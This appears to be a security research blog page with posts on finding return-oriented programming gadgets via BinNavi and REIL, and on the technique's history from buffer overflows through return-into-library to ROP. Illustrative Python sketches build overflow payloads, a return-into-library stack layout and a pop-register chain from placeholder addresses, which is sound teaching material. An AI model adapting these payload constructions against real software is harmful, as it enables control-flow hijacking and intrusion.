After this small definition of what we are actually looking for we can now move on and discuss the algorithms which we will use to help us find instruction sequences which satisfy the above definition.

As we need a starting point for our search of useful instruction sequences, the first step is to locate all free-branch instructions in the targeted binary (In BinNavi this is a single SQL query). After we have collected all of the free-branch instructions we start with phase one of our algorithms, data collection within the binary. The goal of the data collection phase is to provide us with the following information:

  • What possible paths are usable for gadgets and end in a free-branch instruction.
  • What does the REIL representation of the instructions on the possible paths look like.

If you are not familiar with the concepts of REIL ([R]everse [E]ngineering [I]ntermediate [L]anguage), be sure to check the article we posted a while back to get you started.

Now that we have a goal definition for our first phase algorithms we can start looking into the algorithms to get the desired data. To find all paths which could provide useful instruction sequences for gadgets we use an algorithm which traverses backwards through the control flow graph of all the functions where we found free-branch instructions. Using the free-branch instruction as our starting point we walk upwards instruction by instruction until no more instructions are contained in the initial basic block. The following graphic shows examples for ARM and MIPS free-branch instructions.
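The backward walk inside a single basic block can be sketched as follows. This is a simplified Python illustration, not BinNavi code: the `Insn` type and the ARM-only `is_free_branch` heuristic are invented for the example, and the sketch works on textual mnemonics rather than on REIL.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Insn:
    address: int
    mnemonic: str
    operands: str = ""


def is_free_branch(insn: Insn) -> bool:
    """Toy ARM-only heuristic for instructions with an attacker-definable target."""
    mnemonic, operands = insn.mnemonic.lower(), insn.operands.lower()
    if mnemonic == "bx":
        return True               # bx always branches to a register value
    if mnemonic == "pop":
        return "pc" in operands   # pop {..., pc} loads pc from the stack
    return False


def candidate_paths(basic_block):
    """For each free branch, yield every instruction sequence that ends in it."""
    for end, insn in enumerate(basic_block):
        if not is_free_branch(insn):
            continue
        for start in range(end, -1, -1):  # walk upwards, one instruction at a time
            yield basic_block[start:end + 1]
```

Each yielded sequence is a gadget candidate; deciding whether it performs a useful operation is left to a later analysis step.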

Examples for free-branch instructions (more…)
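
The backward walk through the initial basic block can be sketched roughly as follows. This is a simplified illustration under assumptions: a basic block is modelled as a plain list of instruction strings, the function name `backward_paths` is made up, and only the walk inside the initial basic block is covered, not the rest of the control flow graph.

```python
def backward_paths(basic_block, branch_index):
    """Yield every instruction sequence that ends at the free branch.

    basic_block:  list of instruction strings in execution order
    branch_index: position of the free-branch instruction in that list
    """
    # Start with the branch alone, then extend the sequence upwards by one
    # instruction at a time until the start of the basic block is reached.
    for start in range(branch_index, -1, -1):
        yield basic_block[start:branch_index + 1]

# Illustrative ARM-like block; the instructions are examples only.
block = ["LDR R0, [SP, #4]", "ADD R0, R0, R1", "POP {R4, LR}", "BX LR"]
paths = list(backward_paths(block, 3))
```

Each yielded path is a candidate for a gadget; whether it performs a usable operation still has to be decided by a later analysis step.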

A gentle introduction to return-oriented programming

Friday, March 12th, 2010


As promised in my last post, I am starting a series about return-oriented programming. I begin with a short introduction to the topic. The introduction covers the origin of return-oriented programming, describes what return-oriented programming is, and ends with a definition of return-oriented programming which I will use in future posts. I will also take into account some of the recent discussions on Twitter, which showed that even though I thought I had done my history research pretty well, there were still some mailing list posts missing from my timeline.

Why do we need return-oriented programming?

Return-oriented programming is a technique which allows an attacker to execute code in the presence of the following defensive measures:

  • Non executable memory segments
  • Code signing

Where does return-oriented programming come from?

Return-oriented programming is a recently coined term which describes a technique that has been developed in an iterative process in the security community. The term is used for a subset of what can be referred to as code reuse techniques. To understand where return-oriented programming comes from, I show some of the milestones in the technique's history.

Buffer overflows were first publicly documented in the Computer Security Technology Planning Study in 1972 (Appendix 1. Incomplete Parameter Checking). To put this in perspective, one must remember that although we now know this document was published in 1972, only a small circle of individuals had access to it at the time.

A buffer overflow is, in the original form, a very simple error that is introduced if a function does not perform proper bounds checking for the accessed memory. Basically this means the function receives more input data than it can store. Assuming that the overflowed buffer was located on the stack, the attacker can now write a certain amount of data onto the stack where other variables and the return address might be located. Therefore the attacker can hijack the control flow of the current process and perform an arbitrary computation.
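
The effect can be illustrated with a small simulation. This is only a sketch under simplifying assumptions: the stack frame is modelled as a byte array holding a 16-byte buffer directly followed by a 4-byte return address (a real frame contains more), and all names and addresses are made up for the example.

```python
import struct

BUF_SIZE = 16  # size of the local buffer in this simplified model

def make_frame(return_address: int) -> bytearray:
    """Model a frame: a 16-byte buffer followed by a 4-byte return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<I", return_address))

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data into the buffer without checking its length (the bug)."""
    frame[0:len(data)] = data

def read_return_address(frame: bytearray) -> int:
    """Read the little-endian return address stored behind the buffer."""
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]

frame = make_frame(0x08048000)           # made-up legitimate return address
payload = b"A" * BUF_SIZE + struct.pack("<I", 0xDEADBEEF)
unchecked_copy(frame, payload)           # 20 bytes written into a 16-byte buffer
hijacked = read_return_address(frame)    # now holds the attacker's value
```

The four bytes that do not fit into the buffer land on the stored return address, which is exactly the value the function will later jump to.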

The first major attack which used a buffer overflow as the targeted vulnerability was the Morris worm in 1988. But it was not until the late 90s that major operating systems started to have any protection against buffer overflows. For Microsoft operating systems, a form of protection against buffer overflows was only added in 2004, after the Code Red and Slammer worms had changed the company's security mindset.

One of the defensive measures which have been developed to defend against buffer overflows is the option to mark data memory segments as non-executable. This led to the next evolutionary step towards return-oriented programming.

Return-into-library technique

The return-into-library technique is the root on which all return-oriented exploit approaches are based.

A return-into-library exploit works as follows: After the attacker has hijacked the control flow, a library function he chooses is executed. The attacker has made sure that the stack pointer points into a memory segment he controls. The attacker has set up the data in the memory segment in a way that it provides the right arguments to the library function of his choice. Through this he can execute a function with the needed arguments.
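
A rough sketch of such a stack layout for 32-bit x86, where arguments are read from the stack, might look like this. All addresses are made-up placeholders and `build_ret2lib` is a hypothetical helper name; real values depend entirely on the target process.

```python
import struct

# All addresses below are made-up placeholders, not taken from a real binary.
LIBRARY_FUNC_ADDR = 0xB7E42DA0   # hypothetical address of the library function
AFTER_CALL_ADDR = 0xB7E369D0     # hypothetical address it returns to afterwards
ARGUMENT_ADDR = 0xB7F63A24       # hypothetical address of the argument data

def build_ret2lib(padding_len: int) -> bytes:
    """Lay out attacker data so that a 'ret' enters the library function."""
    return b"".join([
        b"A" * padding_len,                    # fills memory up to the return address
        struct.pack("<I", LIBRARY_FUNC_ADDR),  # overwritten return address
        struct.pack("<I", AFTER_CALL_ADDR),    # return address seen by the function
        struct.pack("<I", ARGUMENT_ADDR),      # first argument, read from the stack
    ])

payload = build_ret2lib(20)
```

When the vulnerable function returns, execution continues in the library function, which finds its return address and argument exactly where a regular caller would have placed them.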

The technique of return-into-library exploits was initially presented publicly by Solar Designer in his 1997 posting to the Bugtraq mailing list, which laid the groundwork for return-into-library exploitation. The next milestone in the development of the technique was the Phrack article by Nergal, which summarized the known techniques and broadened the attack vector by introducing esp shifting, allowing unlimited chaining of function calls within return-into-library exploitation.

Borrowed code chunks technique

With the introduction of hardware-supported non-executable memory segments in combination with the support of 64-bit CPUs, the game changed again and traditional return-into-library exploits ceased to work. This was due to an ABI change which required that the arguments to a function be passed in registers rather than on the stack. Stealth developed a new approach that uses chunks of library functions, instead of a call to the function itself, to still be able to exploit buffer overflows on machines that employed the newly introduced defense. The approach is designed around the idea of locating instruction sequences which pop values from the stack into the right registers for function calls. Using this approach, an attacker can use return-into-library exploits with the new ABI. A library which uses this technique in an automated fashion is DEPLib, developed by Pablo Sole. It completely automates the return-oriented approach for Windows operating systems but lacks support for loops and conditional branches (which is negligible from a practical point of view).
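
The idea of popping stack values into argument registers can be sketched as a chain of 64-bit values. This assumes the System V x86-64 convention, in which the first two integer arguments are passed in rdi and rsi; the chunk addresses and the helper `build_chain` are hypothetical and only serve the illustration.

```python
import struct

# Hypothetical addresses for illustration; real values depend on the target.
POP_RDI_RET = 0x00007F0000001234   # chunk: pop rdi ; ret
POP_RSI_RET = 0x00007F0000005678   # chunk: pop rsi ; ret
TARGET_FUNC = 0x00007F0000009ABC   # library function to be called

def qword(value: int) -> bytes:
    """Encode a value as a little-endian 64-bit stack slot."""
    return struct.pack("<Q", value)

def build_chain(arg1: int, arg2: int) -> bytes:
    """Each chunk pops the following stack slot into an argument register."""
    return b"".join([
        qword(POP_RDI_RET), qword(arg1),   # rdi = arg1
        qword(POP_RSI_RET), qword(arg2),   # rsi = arg2
        qword(TARGET_FUNC),                # finally return into the function
    ])

chain = build_chain(0x1111, 0x2222)
```

Every chunk ends in a return, so control passes from one chunk to the next simply by consuming the next address on the attacker-controlled stack.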

Return-oriented programming

The return-oriented programming technique broadens the attack vector even further by introducing loops and conditional branches to the return-oriented approach. The first academic work published in the field of return-oriented programming is Hovav Shacham’s “The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)”. It describes the two major points which are addressed by return-oriented programming in contrast to the rest of the return-into-library techniques.

  • The return-into-library technique has no support for loops and conditional branching.
  • The removal of functions from libraries does not provide any security against return-oriented programming.

For the x86, the approach he uses to find suitable instruction sequences is based on the fact that the x86 uses a variable-length instruction set. It is therefore possible to search for single binary opcodes which alter control flow, such as the return instruction (0xC3), and disassemble the binary backwards from this position. Because instructions can start at any byte, the bytes before the return instruction can provide many possible instruction sequences. Shacham also defined the term gadget, which describes a useful instruction sequence that performs one useful operation such as addition.
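
The first part of this search, locating return opcodes and collecting the byte windows in front of them, can be sketched as follows. This is a simplified illustration and not Shacham's algorithm as published: the function name and the `max_back` parameter are made up, and a real search would disassemble every window and keep only those that decode into valid, useful instructions.

```python
RET_OPCODE = 0xC3

def candidate_sequences(code: bytes, max_back: int = 4):
    """Yield (start, end) offsets of byte windows that end in a ret opcode."""
    for pos, byte in enumerate(code):
        if byte != RET_OPCODE:
            continue
        # Every offset before the ret is a potential decode position,
        # because x86 instructions may begin at any byte.
        for back in range(0, max_back + 1):
            start = pos - back
            if start < 0:
                break
            yield (start, pos + 1)

# The byte pair 0x5F 0xC3 decodes as "pop edi ; ret" on 32-bit x86.
code = bytes([0x90, 0x5F, 0xC3, 0x00, 0xC3])
windows = list(candidate_sequences(code, max_back=2))
```

The window covering offsets 1 to 3 contains the `pop edi ; ret` pair, while other windows may decode into something useless or invalid and would be discarded by the disassembly step.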

One assumption Shacham made was that a fixed-length instruction set would make the application of return-oriented programming infeasible. This was shown not to be the case by Ryan Roemer's work, which targeted the SPARC architecture, which can be seen as the antithesis of the x86 architecture. One change he needed to incorporate into his gadget set was that only memory could be used to pass information between gadgets. This is due to the way SPARC passes information in registers by shifting the register window.

The most practical work published in the field of return-oriented programming is the recent work which targeted the AVC Advantage voting system. This work has shown that return-oriented programming is a valid tool for the offensive security researcher, as no other technique would have been as useful against the Harvard-type architecture upon which the AVC Advantage is built.

What did we learn?

Return-oriented programming is a recently coined term, but the underlying technique has a long history which is based on the work of many security researchers. We have started with its roots in return-into-library attacks and shown how it evolved until today.

In the next post on return-oriented programming, I will explain the first steps of my approach to making return-oriented programming platform independent.